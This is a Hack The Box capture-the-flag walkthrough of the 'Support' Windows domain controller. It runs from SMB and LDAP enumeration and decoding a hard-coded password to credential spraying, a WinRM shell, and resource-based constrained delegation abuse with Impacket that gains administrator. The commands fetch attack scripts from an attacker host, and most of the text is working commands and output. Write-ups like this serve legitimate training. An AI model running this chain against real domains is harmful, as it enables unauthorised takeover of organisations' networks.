---
sidebar_label: 💻️ Support
description: ''
last_update:
  date: 2022/08/12
  author: Raúl Sánchez
tags:
  - smbclient
  - dnSpy
  - ldapsearch
  - crackmapexec
  - Evil-WinRM
  - BloodHound
  - Impacket
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# Support

![](support1.png)

:::caution Disclaimer

**Disclaimer:** No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️

:::

## Setting-up the Environment

First of all, we are going to connect to the **VPN** using my custom [script](https://github.com/RaulSanchezzt/dotfiles/blob/master/scripts/vpn.sh) that I have defined the path of the script in the [`.zshrc`](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) file.

```bash
❯ which vpn
vpn: aliased to sh ~/dotfiles/scripts/vpn.sh

❯ vpn htb
```

Then, start the machine and now we are going to use this [**script**](https://github.com/RaulSanchezzt/dotfiles/blob/master/scripts/htb.sh) to add the *IP* address and **hostname** of this box to the **hosts** file, **allow connections from the target** to our machine and create our working directory. 

```bash
❯ which htb
thm: aliased to sh ~/dotfiles/scripts/htb.sh
```

We will run the script and write the information of this machine.

```python
❯ htb
[!] /etc/hosts file restored from /etc/hosts.bak
[?] Type the IP address of the box: 10.10.11.174
[?] Type the name of the box: Support

[!] Hack The Box Machine
10.10.11.174 Support.htb

[!] Firewall
Status: active

     To                         Action      From
     --                         ------      ----
[ 1] Anywhere                   ALLOW IN    10.10.11.174              

[!] Working directory created
[!] Initial configuration completed
```

## 1. Enumeration

Now we can simply ping to domain name of the machine to check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 support.htb
PING Support.htb (10.10.11.174) 56(84) bytes of data.
64 bytes from Support.htb (10.10.11.174): icmp_seq=1 ttl=127 time=44.2 ms

--- Support.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 44.157/44.157/44.157/0.000 ms
```

To identify which operating system is the target running. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool.

```python
❯ whichSystem.py support.htb

support.htb (ttl -> 127): Windows
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::

### 1.1 Nmap

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

- [-p-](https://nmap.org/book/nmap-overview-and-demos.html) : scan every TCP port [0-65535].
- [--open](https://nmap.org/book/man-port-scanning-basics.html) : show only the applications that are actively accepting TCP connections.
- [-sS](https://nmap.org/book/man-port-scanning-techniques.html) : set TCP SYN scan.
- [--min-rate 5000](https://nmap.org/book/man-performance.html) : send packets as fast as or faster than the given rate.
- [-vvv](https://nmap.org/book/osdetect-usage.html#osdetect-ex-scanme1) : increase the verbosity.
- [-n](https://nmap.org/book/host-discovery-dns.html) : No DNS resolution.
- [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
- {name}.htb : Target machine.
- [-oG](https://nmap.org/book/output-formats-grepable-output.html) : Grepeable output.
- allPorts : Output file name.

```python
❯ sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn support.htb -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-10 16:40 CEST
Initiating SYN Stealth Scan at 16:40
Scanning support.htb (10.10.11.174) [65535 ports]
Discovered open port 139/tcp on 10.10.11.174
Discovered open port 445/tcp on 10.10.11.174
Discovered open port 135/tcp on 10.10.11.174
Discovered open port 53/tcp on 10.10.11.174
Discovered open port 3268/tcp on 10.10.11.174
Discovered open port 389/tcp on 10.10.11.174
Discovered open port 56570/tcp on 10.10.11.174
Discovered open port 464/tcp on 10.10.11.174
Discovered open port 49667/tcp on 10.10.11.174
Discovered open port 88/tcp on 10.10.11.174
Discovered open port 9389/tcp on 10.10.11.174
Discovered open port 49670/tcp on 10.10.11.174
Discovered open port 5985/tcp on 10.10.11.174
Discovered open port 49664/tcp on 10.10.11.174
Discovered open port 55583/tcp on 10.10.11.174
Discovered open port 636/tcp on 10.10.11.174
Discovered open port 49701/tcp on 10.10.11.174
Discovered open port 49675/tcp on 10.10.11.174
Discovered open port 593/tcp on 10.10.11.174
Discovered open port 3269/tcp on 10.10.11.174
Completed SYN Stealth Scan at 16:41, 39.63s elapsed (65535 total ports)
Nmap scan report for support.htb (10.10.11.174)
Host is up, received user-set (0.081s latency).
Scanned at 2022-08-10 16:40:44 CEST for 40s
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49670/tcp open  unknown          syn-ack ttl 127
49675/tcp open  unknown          syn-ack ttl 127
49701/tcp open  unknown          syn-ack ttl 127
55583/tcp open  unknown          syn-ack ttl 127
56570/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 39.74 seconds
           Raw packets sent: 196590 (8.650MB) | Rcvd: 48 (2.112KB)
```

This is the function that I have defined in the [zsh](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) configuration file to extract TCP ports.

```bash
❯ which extractPorts
extractPorts () {
    ports="$(cat $1 | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')" 
    ip_address="$(cat $1 | grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' | sort -u | head -n 1)" 
    echo -e "\n${yellowColour}[*] Extracting information...${endColour}\n"
    echo -e "\t${grayColour}[*] IP Address:${endColour} ${greenColour} $ip_address${endColour}"
    echo -e "\t${grayColour}[*] Open ports:${endColour} ${redColour} $ports${endColour}\n"
    echo $ports | tr -d '\n' | xclip -sel clip
    echo -e "${blueColour}[*] Ports copied to clipboard${endColour}\n"
}
```

Use the command to extract the **TCP ports**.

```python
❯ extractPorts allPorts

[*] Extracting information...

    [*] IP Address:  10.10.11.174
    [*] Open ports:  53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49670,49675,49701,55583,56570

[*] Ports copied to clipboard
```

We will see the open ports on the target machine so now, we are going to use [nmap](https://nmap.org/) again using the parameters below:

- [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.
- [-sC](https://nmap.org/book/man-nse.html) : to performs a script scan using the default set of scripts.
- [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
- [-p](https://nmap.org/book/scan-methods-ip-protocol-scan.html) : to determine which IP protocols are supported by target machine.
- {name}.htb : Target machine.
- [-oN](https://nmap.org/book/output-formats-normal-output.html) : Normal output.
- targeted : Output file name.

```python
❯ nmap -sV -sC -Pn -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49670,49675,49701,55583,56570 support.htb -oN targeted
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-10 16:42 CEST
Stats: 0:01:06 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 16:43 (0:00:00 remaining)
Nmap scan report for support.htb (10.10.11.174)
Host is up (0.077s latency).
rDNS record for 10.10.11.174: Support.htb

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-10 14:42:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49701/tcp open  msrpc         Microsoft Windows RPC
55583/tcp open  msrpc         Microsoft Windows RPC
56570/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-08-10T14:43:01
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.85 seconds
```

:::info
You can find the man page of nmap [here](https://nmap.org/book/toc.html).
:::

### 1.2 smbclient

As **smb** is open we can try to list shared resources.

```
❯ smbclient -N -L support.htb

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    support-tools   Disk      support staff tools
    SYSVOL          Disk      Logon server share 
```

We see the **support-tools** resource which contains certain files.

```
❯ smbclient -N //support.htb/support-tools
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 20 19:01:06 2022
  ..                                  D        0  Sat May 28 13:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 13:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 13:19:55 2022
  putty.exe                           A  1273576  Sat May 28 13:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 13:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 19:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 13:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 13:19:43 2022

        4026367 blocks of size 4096. 696381 blocks available
```

We will download the file `UserInfo.exe.zip` to see what it contains.

```
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (613,1 KiloBytes/sec) (average 613,1 KiloBytes/sec)
smb: \> ^C
❯ unzip UserInfo.exe.zip
Archive:  UserInfo.exe.zip
  inflating: UserInfo.exe            
  inflating: CommandLineParser.dll   
  inflating: Microsoft.Bcl.AsyncInterfaces.dll  
  inflating: Microsoft.Extensions.DependencyInjection.Abstractions.dll  
  inflating: Microsoft.Extensions.DependencyInjection.dll  
  inflating: Microsoft.Extensions.Logging.Abstractions.dll  
  inflating: System.Buffers.dll      
  inflating: System.Memory.dll       
  inflating: System.Numerics.Vectors.dll  
  inflating: System.Runtime.CompilerServices.Unsafe.dll  
  inflating: System.Threading.Tasks.Extensions.dll  
  inflating: UserInfo.exe.config
```

### 1.3 dnSpy

Using the [dnSpy](https://github.com/dnSpy/dnSpy) tool on a **Windows** machine we will find a `username` and `password`.

![](support2.png)

Now in `getPassword()` we can find the way to **decode** the string.

![](support3.png)

We will create a simple **python** **script** to `decode` the string.

```bash
❯ touch decode.py
❯ chmod +x decode.py
❯ vim decode.py
```

Here is the **script**.

```python title=decode.py
#!/bin/python3.10
import base64

enc_password = b"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"

array = base64.b64decode(enc_password)
array2 = []

for i in range(len(array)):
    array2.append(chr(array[i] ^ key[i % len(key)] ^ 223))

print("".join(array2))
```

We will run it to obtain the **decoded string**.

```
❯ python decode.py
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
```

### 1.4 ldapsearch

If we enumerate `LDAP` with the **password**, we can find a field info with a **password**.

```
❯ ldapsearch -D support\\ldap -H ldap://support.htb -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | grep info:
info: Ironside47pleasure40Watchful
```

Then we will create a dictionary with the user names of the system.

```
❯ ldapsearch -D support\\ldap -H ldap://10.10.11.174 -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | grep name: | sed 's/^name: //' | grep -vE 'D|C|A|U'
krbtgt
ldap
support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoria
Guest
❯ ldapsearch -D support\\ldap -H ldap://10.10.11.174 -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | grep name: | sed 's/^name: //' | grep -vE 'D|C|A|U' > users.txt
```

## 2. Foothold

### 2.1 crackmapexec

Using the tool [crackmapexec](https://www.kali.org/tools/crackmapexec/) we will find out what is the **password** of the user `support`.

```
❯ crackmapexec winrm support.htb -u users.txt -p Ironside47pleasure40Watchful
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing SMB protocol database
[*] Initializing WINRM protocol database
[*] Initializing LDAP protocol database
[*] Initializing SSH protocol database
[*] Initializing MSSQL protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB         Support.htb     5985   DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:support.htb)
HTTP        Support.htb     5985   DC               [*] http://Support.htb:5985/wsman
WINRM       Support.htb     5985   DC               [-] support.htb\krbtgt:Ironside47pleasure40Watchful
WINRM       Support.htb     5985   DC               [-] support.htb\ldap:Ironside47pleasure40Watchful
WINRM       Support.htb     5985   DC               [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)
```

### 2.2 Evil-WinRM

We will log in with the credentials of the user support using the [evil-winrm](https://www.kali.org/tools/evil-winrm/) tool. And we will get the **user flag**!

```
❯ evil-winrm -u support -p Ironside47pleasure40Watchful -i support.htb

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\support\Documents> whoami
support\support
*Evil-WinRM* PS C:\Users\support\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> dir


    Directory: C:\Users\support\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         8/11/2022  10:15 PM             34 user.txt


*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
```

### 2.3 BloodHound

Now we will use the [bloodhound](https://www.kali.org/tools/bloodhound/) tool to **map** the domain and **extract** information about the user `support`. Following the [documentation](https://bloodhound.readthedocs.io/en/latest/installation/linux.html) we will install the tool **quickly**. Then we will install the tool from **pip**.

```bash
❯ pip3 install bloodhound
```

We will extract as much **information** as possible, which will be exported in `.json` format.

```
❯ bloodhound-python -c All -u support -p Ironside47pleasure40Watchful -ns 10.10.11.174 --dns-tcp -d support.htb
INFO: Found AD domain: support.htb
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: Management.support.htb
INFO: Querying computer: dc.support.htb
INFO: Done in 00M 12S
❯ ls
computers.json  domains.json  groups.json  users.json
```

We will then import these files into the **BloodHound GUI** and see that the `support` user has **<u>GenericAll</u>** privileges.

![](support4.png)

We will use this [article](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution) to **escalate** privileges, the first thing we will do is to upload the modules [Powermad.ps1](https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1)  and [PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) to the target to **import** them.

```
*Evil-WinRM* PS C:\Users\support\Desktop> cd C:\ProgramData
*Evil-WinRM* PS C:\ProgramData> curl 10.10.14.88:80/Powermad.ps1 -o Powermad.ps1
*Evil-WinRM* PS C:\ProgramData> curl 10.10.14.88:80/PowerView.ps1 -o PowerView.ps1
*Evil-WinRM* PS C:\ProgramData> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\ProgramData> Import-Module .\PowerView.ps1
```

## 3. Privilege Escalation

We start by creating an account with the name **fake10** and the password **123456**.

```
*Evil-WinRM* PS C:\ProgramData> New-MachineAccount -MachineAccount fake10 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Verbose: [+] Domain Controller = dc.support.htb
Verbose: [+] Domain = support.htb
Verbose: [+] SAMAccountName = fake10$
Verbose: [+] Distinguished Name = CN=fake10,CN=Computers,DC=support,DC=htb
[+] Machine account fake10 added
```

Now we need to get the **SID** of the account we have created.

```
*Evil-WinRM* PS C:\ProgramData> Get-DomainComputer fake10 -Properties objectsid

objectsid
---------
S-1-5-21-1677581083-3380853377-188903654-5104
```

Once we have the **SID** we can proceed with the following [steps](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#creating-a-new-computer-object).

```
*Evil-WinRM* PS C:\ProgramData> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5104)"
*Evil-WinRM* PS C:\ProgramData> $SDBytes = New-Object byte[] ($SD.BinaryLength)
*Evil-WinRM* PS C:\ProgramData> $SD.GetBinaryForm($SDBytes, 0)
*Evil-WinRM* PS C:\ProgramData> Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
```

Before we continue we will add the domain name to the` /etc/hosts` file.

```python
[!] Hack The Box Machine
10.10.11.174 Support.htb dc.support.htb
```

### 3.1 Impacket

In the final point, rather than playing with **rubeus** to obtain the ticket, we can do it with [Impacket](https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py).

```
❯ impacket-getST support.htb/fake10:123456 -dc-ip 10.10.11.174 -impersonate administrator -spn www/dc.support.htb
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
```

With the ticket we can connect to [wmiexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py) and become **Administrator** to get the **root flag!**

```
❯ export KRB5CCNAME=administrator.ccache
❯ impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
support\administrator

C:\>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 955A-5CBB

 Directory of C:\Users\Administrator\Desktop

05/28/2022  04:17 AM    <DIR>          .
05/28/2022  04:11 AM    <DIR>          ..
08/11/2022  10:15 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,561,672,704 bytes free

C:\Users\Administrator\Desktop>type root.txt
```

I hope you made it too, see you next timee! 🙃
